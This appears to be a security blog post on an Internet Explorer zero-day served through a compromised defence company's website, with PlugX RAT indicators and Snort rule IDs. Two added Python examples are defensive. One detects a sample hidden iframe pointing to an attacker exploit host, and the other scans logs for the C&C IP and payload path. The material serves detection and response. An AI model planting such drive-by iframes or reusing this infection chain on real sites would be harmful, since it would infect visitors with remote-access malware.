Following our investigation of the servers found serving the Internet Explorer zero-day, and using OSINT, we were able to use the WHOIS email address and the IP addresses used by the attackers to find fake domains registered by them that contain the names of specific companies related to:
- US Aircraft and weapons delivery systems company
- US Defence decoy countermeasures company
- US Aerospace and defence technology company
- US Supplier for repairs of tactical fighters
- Laboratory for energetic systems and materials
- UK Defence contractor
We also found a fake domain of a company that builds turbines and power sources used in several applications including utilities and power plants.
We were also able to confirm that the company's official website has been compromised and is serving the Internet Explorer zero-day to its visitors. They included an iframe pointing to the exploit in the entry page:
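A quick way for a site owner to check an entry page for this kind of injection is to list every iframe and flag those that point off-site or are hidden. The following is an added example, not code from the original post or from the affected company; the sample page, the site host `www.corp.example` and the attacker host `attacker.example` are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a compromised entry page: one legitimate iframe and one
# injected, zero-size, hidden iframe pointing at an external exploit host.
SAMPLE_PAGE = """<html><head><title>Corp</title></head>
<body>
<h1>Welcome</h1>
<iframe src="/news/feed.html" width="600" height="400"></iframe>
<iframe src="http://attacker.example/exploit/index.html" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Boolean attributes arrive with value None; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True if the iframe is sized away or hidden by inline style."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, site_host):
    """Return iframes whose src is external to site_host or which are hidden."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).netloc.lower()
        external = bool(host) and host != site_host.lower()
        hidden = is_hidden(attrs)
        if external or hidden:
            findings.append({"src": src, "external": external, "hidden": hidden})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_PAGE, "www.corp.example"):
        print(f)
```

Run it against a saved copy of the page rather than fetching the live site from an analyst workstation; a relative `src` on the same host can still be malicious if the server itself is compromised, so treat the hidden-iframe check as the stronger signal.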
The version of the exploit found appears to be based on the code we found on the previous servers, and it also uses the Grumgog.swf Flash file to aid in exploitation.
Apart from that, the exploit code seems to have evolved: it can now infect not only Windows XP but also 32-bit Windows 7 running Java 6. This is based on the Dodge.html file we found within the exploit code:
The Flash file is encrypted with DoSWF, like the previous versions, and licensed to email@example.com. Once the vulnerability is triggered, the malicious code downloads the payload from /_include/site.exe.
The PlugX RAT connects to a C&C server at oXXX.blogdns.com, which resolves to 126.96.36.199. I recommend that you search your logs for connections to that IP address, since they are a symptom of a compromised system.
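The log search suggested above, as an added example that is not part of the original post: it scans proxy log lines for the C&C IP and the payload path given in the post and lists the internal hosts that touched them. The C&C hostname is elided in the post, so only the IP and the path are used. The log format (timestamp, client, method, URL, status, destination IP) and the log lines themselves are constructed for the example; `www.example-vendor.com` and the `203.0.113.10` / `10.x` addresses are placeholders.

```python
import re

# Indicators from the post.
C2_IP = "126.96.36.199"
PAYLOAD_PATH = "/_include/site.exe"

# Constructed sample proxy log: ts client method url status dst_ip
SAMPLE_LOG = """\
2012-09-18T10:02:11Z 10.1.4.22 GET http://www.example-vendor.com/ 200 203.0.113.10
2012-09-18T10:02:13Z 10.1.4.22 GET http://www.example-vendor.com/Grumgog.swf 200 203.0.113.10
2012-09-18T10:02:14Z 10.1.4.22 GET http://www.example-vendor.com/_include/site.exe 200 203.0.113.10
2012-09-18T10:03:40Z 10.1.4.22 CONNECT 126.96.36.199:443 200 126.96.36.199
2012-09-18T10:05:02Z 10.1.7.9 GET http://intranet.local/ 200 10.1.7.1
2012-09-18T11:15:27Z 10.1.9.31 POST http://126.96.36.199/update.php 200 126.96.36.199
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+"
    r"(?P<status>\d{3})\s+(?P<dst>\S+)$"
)

# Match the IP only as a whole dotted quad, so 126.96.36.1990 would not match.
C2_IP_RE = re.compile(r"(?<![\d.])" + re.escape(C2_IP) + r"(?![\d])")


def scan_log(text):
    """Return one record per log line that matches an indicator, with reasons."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        url, dst = m["url"], m["dst"]
        reasons = []
        if dst == C2_IP or C2_IP_RE.search(url):
            reasons.append("c2-ip")
        if url.endswith(PAYLOAD_PATH):
            reasons.append("payload-path")
        if reasons:
            hits.append({"ts": m["ts"], "client": m["client"],
                         "url": url, "reasons": reasons})
    return hits


def compromised_hosts(hits):
    """Distinct internal clients that appear in the matched records."""
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["client"], h["url"], ",".join(h["reasons"]))
    print("hosts to triage:", compromised_hosts(found))
```

A host that fetched the payload path and then connected to the C&C IP, as 10.1.4.22 does in the sample, should be treated as compromised rather than merely exposed; a hit on the IP alone still warrants checking the host for PlugX.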
On the other hand, these Emerging Threats Snort rules will help you catch exploit attempts and related activity:
- 2015704 – ET CURRENT_EVENTS DoSWF Flash Encryption Banner
- 2015711 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day
- 2015712 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day